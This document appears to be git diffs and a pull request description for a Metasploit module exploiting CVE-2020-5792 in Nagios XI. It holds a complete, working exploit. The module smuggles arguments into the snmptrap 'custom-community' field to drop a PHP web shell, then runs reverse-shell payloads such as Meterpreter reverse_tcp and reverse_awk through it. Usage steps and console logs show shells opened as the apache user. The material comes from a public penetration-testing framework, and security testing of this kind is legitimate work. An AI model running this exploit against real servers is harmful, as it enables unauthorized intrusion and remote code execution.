-          user. The module uploads a simple PHP shell to the vulnerable location,
-          and then executes the payload via an HTTP GET request to
-          `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
+          user. The module uploads a simple PHP shell via includes/components/nxti/index.php
+          to includes/components/autodiscovery/jobs/<php_shell> and then
+          executes the payload as the `apache` user via an HTTP GET request to
+          includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>
 
           Valid credentials for a Nagios XI admin user are required. This module has
           been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
@@ -38,12 +39,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             ['CVE', '2020-5792']
           ],
-        'Platform' => %w[linux unix php],
+        'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' =>
           [
             [
-              'Linux', {
+              'Linux (x86/x64)', {
                 'Arch' => [ARCH_X86, ARCH_X64],
                 'Platform' => 'linux',
                 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
@@ -64,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'Notes' =>
           {
-            'Stability' => [ CRASH_SAFE, ],
+            'Stability' => [ CRASH_SAFE ],
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [REPEATABLE_SESSION]
+            'Reliability' => [ REPEATABLE_SESSION ]
           }
       )
     )
@@ -91,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
-    # an array containing the http response body of a get request to index.php and the session cookies
+    # an array containing the http response body of a GET request to index.php and the session cookies
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
     when 1..3 # An error occurred
@@ -140,6 +141,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Target is Nagios XI with version #{nagios_version}")
+
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    end
+
     # check if the target is actually vulnerable
     version = Rex::Version.new(nagios_version)
     if version >= Rex::Version.new('5.5.0') && version <= Rex::Version.new('5.7.3')
@@ -149,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe
   end
 
-  def print_message(payload_string)
+  def alert_exploit_attempt(payload_string)
     payload_execution = "#{normalize_uri(target_uri.path, 'includes', 'components', 'autodiscovery', 'jobs', @php_log_file)}?#{@php_param}=<cmd>"
     print_status("Attempting to execute the #{payload_string} via `#{payload_execution}`")
   end
@@ -206,10 +212,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     upload_php_shell # upload a simple php shell that will be used to execute the payload
     if target.arch.first == ARCH_CMD
-      print_message('payload')
+      alert_exploit_attempt('payload')
       execute_command(payload.encoded)
     else
-      print_message('initial payload')
+      alert_exploit_attempt('initial payload')
       execute_cmdstager(background: true)
     end
   end

--- a/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
@@ -1,0 +1,168 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.3 - Snmptrap Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits an OS command injection vulnerability in
+          `includes/components/nxti/index.php` that enables an authenticated user
+          with admin privileges to achieve remote code execution as the `apache`
+          user. The module uploads a simple PHP shell to the vulnerable location,
+          and then executes the payload via an HTTP GET request to
+          `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
+
+          Valid credentials for a Nagios XI admin user are required. This module has
+          been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Chris Lyne', # discovery
+            'Erik Wynter' # @wyntererik - Metasploit'
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-5792']
+          ],
+        'Platform' => %w[linux unix php],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+        'Targets' =>
+          [
+            [
+              'Linux', {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Platform' => 'linux',
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'CMD', {
+                'Arch' => [ARCH_CMD],
+                'Platform' => 'unix',
+                # cmd/unix/reverse_awk is one of the few reliable CMD payloads for a typical NagiosXI install (CentOS 7 minimal).
+                # other options are cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_awk' }
+              }
+            ],
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    # obtain cookies required for authentication
+    cookies = nagios_xi_login(username, password)
+    if cookies.instance_of? Msf::Exploit::CheckCode
+      return cookies
+    end
+
+    # authenticate and obtain the Nagios XI version
+    print_good('Successfully authenticated to Nagios XI')
+    version = nagios_xi_version_index(cookies)
+    if version.instance_of? Msf::Exploit::CheckCode
+      return version
+    end
+
+    print_status("Target is Nagios XI with version #{version}")
+
+    # check if the target is actually vulnerable
+    unless version == '5.7.3'
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def print_message(payload_string)
+    payload_execution = "#{normalize_uri(target_uri.path, 'includes', 'components', 'autodiscovery', 'jobs', @php_log_file)}?#{@php_param}=<cmd>"
+    print_status("Attempting to execute the #{payload_string} via `#{payload_execution}`")
+  end
+
+  def upload_php_shell
+    # prepare the variables we need
+    @php_param = rand_text_alpha(1) # this does not work with longer parameters
+    php_shell = "<?php /*      */system(/*     */$_GET[\"#{@php_param}\"])/* */?>"
+    encoded_payload = Rex::Text.to_hex(php_shell)
+    encoded_payload.gsub!('\x', '') # get clean hex without the \x format
+    @php_log_file = "#{rand_text_alpha(8..12)}.php"
+    php_log_file_path = "/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/#{@php_log_file}"
+    register_file_for_cleanup(php_log_file_path)
+
+    # upload the shell
+    print_status("Uploading a simple PHP shell to #{php_log_file_path}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'includes', 'components', 'nxti', 'index.php'),
+      'vars_get' =>
+      {
+        'custom-version' => '2c',
+        'generic-trap-option' => '0',
+        'specific-trap-option' => '',
+        'custom-agent' => '',
+        'custom-community' => "a -d -L f #{php_log_file_path}",
+        'custom-oid' => 'NET-SNMP-EXAMPLES-MIB::netSnmpExampleHeartbeatNotification',
+        'variablebindings[name][]' => 'x',
+        'variablebindings[type][]' => 'x',
+        'variablebindings[value][]' => encoded_payload,
+        'mode' => 'customTrap'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the PHP shell')
+    end
+
+    unless res.code == 200 && res.body.include?('var message = "Custom trap sent successfully!";')
+      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to upload the PHP shell')
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'includes', 'components', 'autodiscovery', 'jobs', @php_log_file),
+      'vars_get' => { @php_param => cmd }
+    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    upload_php_shell # upload a simple php shell that will be used to execute the payload
+    if target.arch.first == ARCH_CMD
+      print_message('payload')
+      execute_command(payload.encoded)
+    else
+      print_message('initial payload')
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Nagios XI 5.7.3 - Snmptrap Authenticated Remote Code Exection',
+        'Name' => 'Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits an OS command injection vulnerability in
           `includes/components/nxti/index.php` that enables an authenticated user
@@ -61,7 +61,13 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Privileged' => false,
         'DisclosureDate' => '2020-10-20',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [REPEATABLE_SESSION]
+          }
       )
     )
 
@@ -79,28 +85,68 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
   def check
-    # obtain cookies required for authentication
-    cookies = nagios_xi_login(username, password)
-    if cookies.instance_of? Msf::Exploit::CheckCode
-      return cookies
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result
+        return CheckCode::Unknown(install_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3 # An error occurred
+        return CheckCode::Unknown(res_array[0])
+      when 4 # Nagios XI is still not fully installed
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
     end
 
-    # authenticate and obtain the Nagios XI version
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
     print_good('Successfully authenticated to Nagios XI')
-    version = nagios_xi_version_index(cookies)
-    if version.instance_of? Msf::Exploit::CheckCode
-      return version
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
     end
 
-    print_status("Target is Nagios XI with version #{version}")
-
+    print_status("Target is Nagios XI with version #{nagios_version}")
     # check if the target is actually vulnerable
-    unless version == '5.7.3'
-      return Exploit::CheckCode::Safe
+    version = Rex::Version.new(nagios_version)
+    if version >= Rex::Version.new('5.5.0') && version <= Rex::Version.new('5.7.3')
+      return CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Appears
+    return CheckCode::Safe
   end
 
   def print_message(payload_string)
@@ -123,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'includes', 'components', 'nxti', 'index.php'),
+      'cookie' => @auth_cookies,
       'vars_get' =>
       {
         'custom-version' => '2c',
@@ -151,6 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'includes', 'components', 'autodiscovery', 'jobs', @php_log_file),
+      'cookie' => @auth_cookies,
       'vars_get' => { @php_param => cmd }
     }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
   end


### PR DESCRIPTION
## About
This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-5792) in Naxios XI version 5.7.3 (and possibly older versions) to achieve remote code execution as the apache user. The check method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Naxios XI version 5.7.3 (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/FstbNexJNZ.php?T=<cmd>`
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42758) at 2021-02-01 11:19:46 -0500
[*] Command Stager progress - 100.00% done (773/773 bytes)
[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php' on the target

meterpreter > 
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/wMwKGRHf.php?W=<cmd>`
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41607) at 2021-02-01 11:21:12 -0500
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```